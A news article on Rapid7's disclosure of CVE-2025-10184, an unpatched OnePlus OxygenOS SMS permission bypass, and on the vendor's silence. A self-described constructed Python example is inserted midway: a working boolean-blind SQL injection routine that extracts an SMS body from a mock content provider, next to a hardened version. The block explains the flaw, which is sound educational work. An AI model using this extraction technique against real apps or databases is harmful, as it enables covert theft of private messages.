Several OnePlus smartphones running OxygenOS have an unpatched permission bypass vulnerability that could let a malicious app on the device read SMS data without the permission Android normally requires.
Security researchers at Rapid7 found the permission bypass in several versions of OxygenOS, the Android-based operating system that ships on smartphones from device maker OnePlus.
Alarmingly, however, Rapid7 has said it is unable to coordinate a proper disclosure process with OnePlus, due to the latter’s restrictive terms and conditions in relation to its bug bounty program.
“While OnePlus does advertise a public bug bounty program for reporting vulnerabilities, Rapid7 cannot engage with their bug bounty program due to its restrictive non-disclosure agreement (NDA) terms and conditions,” Rapid7 said in a 23 September blog post.
“Therefore CVE-2025-10184 is being disclosed as not fixed by the vendor at the time of disclosure.”
Rapid7 confirmed the issue on two OnePlus handsets across multiple OxygenOS versions and believes it affects the wider range of devices running those versions. Sensitive internal content providers on the devices can be queried by any app installed on the device, without the permission Android would normally require, and the query interface itself is vulnerable to SQL injection.
This, according to Rapid7, could let a threat actor bypass core Android permissions and extract SMS data without user consent.
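To make concrete what an SQL-injectable content provider means in practice, the following is an added, constructed Python/SQLite model; it is not Rapid7's proof of concept and not OnePlus code. The table names (`push_message`, `sms`), the shape of the provider's query, the row contents and the `query_vulnerable` / `query_hardened` functions are all assumptions made for illustration. On Android the caller-controlled string is the `selection` argument of `ContentProvider.query()`; if the provider is exported to other apps without a permission and splices `selection` into its `WHERE` clause, an app with no SMS permission can use the provider as a yes/no oracle and pull data out of any table in the same database one character at a time, which is the blind extraction shown below.

```python
"""Constructed model of a content-provider SQL injection (not OnePlus code)."""
import sqlite3


def build_db():
    """Constructed sample database: one harmless table the provider is meant
    to expose, and one sensitive table that lives in the same SQLite file."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE push_message (_id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE sms (_id INTEGER PRIMARY KEY, address TEXT, body TEXT);
        INSERT INTO push_message(title) VALUES ('promo');
        INSERT INTO sms(address, body) VALUES ('+15551234', 'Your code is 482913');
    """)
    return conn


# Vulnerable provider: the caller-controlled selection string is concatenated
# straight into the WHERE clause, exactly as a ContentProvider.query() that
# builds "SELECT ... WHERE " + selection would do.
def query_vulnerable(conn, selection):
    sql = "SELECT _id, title FROM push_message WHERE " + selection
    return conn.execute(sql).fetchall()


def _ask(conn, condition):
    """Boolean oracle: did the provider return any row for this selection?"""
    return len(query_vulnerable(conn, condition)) > 0


def extract_sms_body(conn, row_id=1, max_len=64):
    """Blind, boolean-based extraction of sms.body through the exposed
    provider. Each character is found by binary search over printable ASCII
    using only 'does a row come back' answers (about 7 queries per char)."""
    body = ""
    for pos in range(1, max_len + 1):
        # Stop when the hidden string has no character at this position.
        if not _ask(conn, f"(SELECT length(body) FROM sms WHERE _id={row_id}) >= {pos}"):
            break
        lo, hi = 32, 126  # printable ASCII code points
        while lo < hi:
            mid = (lo + hi) // 2
            probe = (f"(SELECT unicode(substr(body,{pos},1)) FROM sms "
                     f"WHERE _id={row_id}) > {mid}")
            if _ask(conn, probe):
                lo = mid + 1
            else:
                hi = mid
        body += chr(lo)
    return body


# Hardened provider: the caller may only filter on an allow-listed column and
# the value is bound as a parameter, never interpolated. (The Android
# equivalents are SQLiteQueryBuilder.setStrict(true) for the selection and,
# above all, not exporting the provider or guarding it with a permission.)
ALLOWED_COLUMNS = {"_id", "title"}


def query_hardened(conn, column, value):
    if column not in ALLOWED_COLUMNS:
        raise ValueError("column not permitted")
    sql = f"SELECT _id, title FROM push_message WHERE {column} = ?"
    return conn.execute(sql, (value,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("leaked via blind injection:", extract_sms_body(db))
    print("hardened, legit query:", query_hardened(db, "title", "promo"))
    print("hardened, injection attempt:", query_hardened(db, "title", "promo' OR 1=1 --"))
```

The attacker never sees the `sms` table directly; the only thing it observes is whether `push_message` rows come back, which is why a provider that looks harmless on its own is still a full SMS-read primitive once its `WHERE` clause is attacker-controlled. Parameterising the value is necessary but not sufficient on Android: the provider also has to be non-exported or permission-gated, otherwise the allow-list is the only thing standing between an unprivileged app and the database.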
“At this particular moment in time, surveillance-related vulnerabilities and threats are of strong interest to many governments and threat actors,” Rapid7 said.
“A wide-reaching issue like this could be a boon to both state-sponsored adversaries looking to surveil victims and authoritarian regimes looking to oppress political dissidence.”
The vulnerability is present on both a OnePlus 8T running OxygenOS 12 and a OnePlus 10 Pro 5G running OxygenOS 14 and 15. It does not appear to be present in OxygenOS 11, leading the researchers to believe it was introduced in version 12 of the OS. Rapid7 believes the issue is not hardware-related, so it is unlikely to be limited to the two models tested.
Rapid7 first contacted the OnePlus Security Response Center in May but received no response. Two further attempts followed; in early July the company's support team said the issue would be raised internally, but again nothing came back.
Further attempts in July and August also went unanswered, so Rapid7 approached phone maker OPPO, which has a business relationship with OnePlus, and that too was met with silence.
“Rapid7 considers OnePlus a non-responsive vendor and publicly discloses CVE-2025-10184 via this disclosure blog post,” Rapid7 said.
Cyber Daily has reached out to OnePlus for comment.
David Hollingworth has been writing about technology for over 20 years, and has worked for a range of print and online titles in his career. He is enjoying getting to grips with cyber security, especially when it lets him talk about Lego.